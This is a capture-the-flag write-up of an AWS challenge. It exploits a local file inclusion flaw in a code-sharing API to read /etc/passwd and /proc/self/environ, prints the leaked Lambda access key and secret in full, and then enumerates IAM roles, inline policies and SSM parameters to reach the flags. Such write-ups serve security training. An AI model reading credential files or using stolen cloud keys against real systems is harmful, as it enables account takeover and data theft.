Sharing is Caring + Sequel
Description
Using Code Sharing Platform, you found the access to the AWS temporary credentials. Now you need to get into the cloud infrastructure and start with the enumeration part, and during this process you will find the flag.
Solution
From the description, I assumed the code sharing platform refers to the earlier Tony Tony Tony challenge.
// Client-side script of the code sharing page: sets up the editor and POSTs
// the code to the share API, then shows the raw response on the page.

// Attach a CodeMirror editor to the element with id "code".
var codeEditor = CodeMirror.fromTextArea(document.getElementById("code"), {
lineNumbers: true,
mode: "javascript",
theme: "default"
});
var myHeaders = new Headers();
// NOTE(review): the authorizationToken value is hard-coded in script that runs
// in the browser, so anyone who can read the page source can replay it.
// A value used as a credential should not be embedded in client-side code.
myHeaders.append("authorizationToken", "flag-{gtkO4f4NOrJsRRNZWxiTbL6LLUs5Ir8g}");
myHeaders.append("Content-Type", "application/json");
// JSON request body with a single "codeFile" field.
// NOTE(review): `code` is not defined anywhere in this fragment; presumably it
// is meant to hold the editor contents. Confirm against the full page.
// The value is sent as-is, so any validation has to happen on the server.
var raw = JSON.stringify({
"codeFile": code
});
var requestOptions = {
method: 'POST',
headers: myHeaders,
body: raw,
redirect: 'follow'
};
// Send the request and read the response body as plain text.
fetch("https://jg0rh6th8e.execute-api.ap-south-1.amazonaws.com/test/share", requestOptions)
.then(response => response.text())
.then(result => {
var resultDiv = document.getElementById("result");
// Clear any previous output before rendering the new response.
resultDiv.innerHTML = "";
var pre = document.createElement("pre");
// Assigned through innerText, so the response is displayed as text and is not
// parsed as HTML.
pre.innerText = result;
resultDiv.appendChild(pre);
})
// Failures are only logged to the console; nothing is shown on the page.
.catch(error => console.log('error', error));
However, the code from the Tony Tony Tony code sharing platform is incomplete, and I can't send any request with it as is. Instead, I used Postman and followed the instructions in the code to send a POST request.
I sent a POST request with a random value for "codeFile" and received an error containing a stack trace.
After fuzzing the "codeFile" value for a bit, my teammate identified a local file inclusion vulnerability that let us retrieve /etc/passwd as a proof of concept.
Reading the /proc/self/environ file returned a set of AWS credentials, because Lambda passes the execution role's temporary credentials to the function as environment variables.
{
"statusCode": 200,
"body": "b'LANG=en_US.UTF-8\\x00_AWS_XRAY_DAEMON_ADDRESS=169.254.79.129\\x00AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/ShareCodeFile\\x00AWS_LAMBDA_LOG_STREAM_NAME=2023/04/24/[$LATEST]0a87da37d7f54fd6be10cc5285ce2a29\\x00TZ=:UTC\\x00AWS_DEFAULT_REGION=ap-south-1\\x00PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\\x00AWS_XRAY_CONTEXT_MISSING=LOG_ERROR\\x00AWS_SESSION_TOKEN=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\\x00AWS_EXECUTION_ENV=AWS_Lambda_rapid\\x00LAMBDA_TASK_ROOT=/var/task\\x00LAMBDA_RUNTIME_DIR=/var/runtime\\x00_HANDLER=lambda_function.lambda_handler\\x00AWS_REGION=ap-south-1\\x00_AWS_XRAY_DAEMON_PORT=2000\\x00AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\\x00AWS_LAMBDA_FUNCTION_VERSION=$LATEST\\x00LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\\x00AWS_XRAY_DAEMON_ADDRESS=169.254.79.129:2000\\x00AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73\\x00AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2\\x00AWS_LAMBDA_FUNCTION_NAME=ShareCodeFile\\x00AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\\x00AWS_LAMBDA_INITIALIZATION_TYPE=on-demand\\x00'"
}
AWS_SESSION_TOKEN=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
AWS_REGION=ap-south-1
AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73
AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2
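Next, I configured the AWS CLI with aws configure and manually added the session token to the ~/.aws/credentials file, since aws configure does not prompt for it and temporary credentials are rejected without it.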
Running aws iam list-roles
returns a bunch of roles
{
"Roles": [
{
"Path": "/service-role/",
"RoleName": "APIAuthorizer-role-htxly2ru",
"RoleId": "AROAYX67JAH5PXCHMU4DI",
"Arn": "arn:aws:iam::601226805754:role/service-role/APIAuthorizer-role-htxly2ru",
"CreateDate": "2023-04-11T05:41:15Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ops.apigateway.amazonaws.com/",
"RoleName": "AWSServiceRoleForAPIGateway",
"RoleId": "AROAYX67JAH5DPM2D3IHV",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ops.apigateway.amazonaws.com/AWSServiceRoleForAPIGateway",
"CreateDate": "2023-04-11T05:04:43Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ops.apigateway.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "The Service Linked Role is used by Amazon API Gateway.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/",
"RoleName": "AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
"RoleId": "AROAYX67JAH5GQPRXIFNT",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
"CreateDate": "2023-04-08T16:55:41Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "dynamodb.application-autoscaling.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ecs.application-autoscaling.amazonaws.com/",
"RoleName": "AWSServiceRoleForApplicationAutoScaling_ECSService",
"RoleId": "AROAYX67JAH5LWWXBCO26",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_ECSService",
"CreateDate": "2023-04-08T19:33:23Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ecs.application-autoscaling.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ecs.amazonaws.com/",
"RoleName": "AWSServiceRoleForECS",
"RoleId": "AROAYX67JAH5BZGC632I4",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.amazonaws.com/AWSServiceRoleForECS",
"CreateDate": "2023-04-08T18:44:05Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ecs.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Role to enable Amazon ECS to manage your cluster.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/elasticache.amazonaws.com/",
"RoleName": "AWSServiceRoleForElastiCache",
"RoleId": "AROAYX67JAH5AA2RHP4S2",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticache.amazonaws.com/AWSServiceRoleForElastiCache",
"CreateDate": "2023-04-08T18:44:08Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticache.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "This policy allows ElastiCache to manage AWS resources on your behalf as necessary for managing your cache.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/elasticloadbalancing.amazonaws.com/",
"RoleName": "AWSServiceRoleForElasticLoadBalancing",
"RoleId": "AROAYX67JAH5ID7BXSSCA",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticloadbalancing.amazonaws.com/AWSServiceRoleForElasticLoadBalancing",
"CreateDate": "2023-04-08T18:44:08Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticloadbalancing.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows ELB to call AWS services on your behalf.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/rds.amazonaws.com/",
"RoleName": "AWSServiceRoleForRDS",
"RoleId": "AROAYX67JAH5KGFGF3UWA",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS",
"CreateDate": "2023-04-08T18:44:07Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rds.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows Amazon RDS to manage AWS resources on your behalf",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/support.amazonaws.com/",
"RoleName": "AWSServiceRoleForSupport",
"RoleId": "AROAYX67JAH5OJSEOXQHS",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
"CreateDate": "2023-03-10T15:41:26Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "support.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Enables resource access for AWS to provide billing, administrative and support services",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/trustedadvisor.amazonaws.com/",
"RoleName": "AWSServiceRoleForTrustedAdvisor",
"RoleId": "AROAYX67JAH5KEKIKCCTX",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
"CreateDate": "2023-03-10T15:41:26Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "trustedadvisor.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Access for the AWS Trusted Advisor Service to help reduce cost, increase performance, and improve security of your AWS environment.",
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "ctfd-ecs-task-execution",
"RoleId": "AROAYX67JAH5JV676JWAN",
"Arn": "arn:aws:iam::601226805754:role/ctfd-ecs-task-execution",
"CreateDate": "2023-04-08T18:44:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ECSAssumeRole",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "ctfd-secrets-role",
"RoleId": "AROAYX67JAH5N3L6SZDHL",
"Arn": "arn:aws:iam::601226805754:role/ctfd-secrets-role",
"CreateDate": "2023-04-08T18:44:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ECSTasksAssumeRole",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "CustomAPILambdaAuth-role-03rd552i",
"RoleId": "AROAYX67JAH5DDDSFZDDT",
"Arn": "arn:aws:iam::601226805754:role/service-role/CustomAPILambdaAuth-role-03rd552i",
"CreateDate": "2023-04-11T07:28:07Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "OptionsHandler-role-clu7piz8",
"RoleId": "AROAYX67JAH5GUMLLS2HX",
"Arn": "arn:aws:iam::601226805754:role/service-role/OptionsHandler-role-clu7piz8",
"CreateDate": "2023-04-19T11:29:16Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "ShareCodeFile-role-sbutfhkq",
"RoleId": "AROAYX67JAH5GNBPLQTIR",
"Arn": "arn:aws:iam::601226805754:role/service-role/ShareCodeFile-role-sbutfhkq",
"CreateDate": "2023-04-11T05:09:38Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
}
]
}
The role ShareCodeFile-role-sbutfhkq seems interesting, as its name matches the identity we are authenticated as (the ShareCodeFile Lambda function).
Running aws iam list-role-policies --role-name role-name lists the names of the inline policies embedded in the specified IAM role:
{
"PolicyNames": [
"SSMParametersLISTREAD",
"ZmxhZy17a0drMTlzQmN3TlJua2FyWkZLYW1vS1E0TzZzQzRpSjF9"
]
}
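Base64-decoding the second policy name returns the flag. (The flag quoted below differs from what the policy name in the listing above decodes to, so the two were presumably captured from different challenge instances.)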
Flag: flag-{GaW6NW8vzwIhh8qU643AV3ohh4gwDByw}
Sharing is Caring Sequel
From the policy name SSMParametersLISTREAD, I guessed that I had permission to list and read parameters in SSM.
Running aws ssm describe-parameters
shows the flag location
I am then able to use aws ssm get-parameter --name "/envcodeshare/test/flag"
to retrieve the flag value
Flag: flag-{fUg3jZueA4J1u7nEVNqLFVASEZcyYjR0}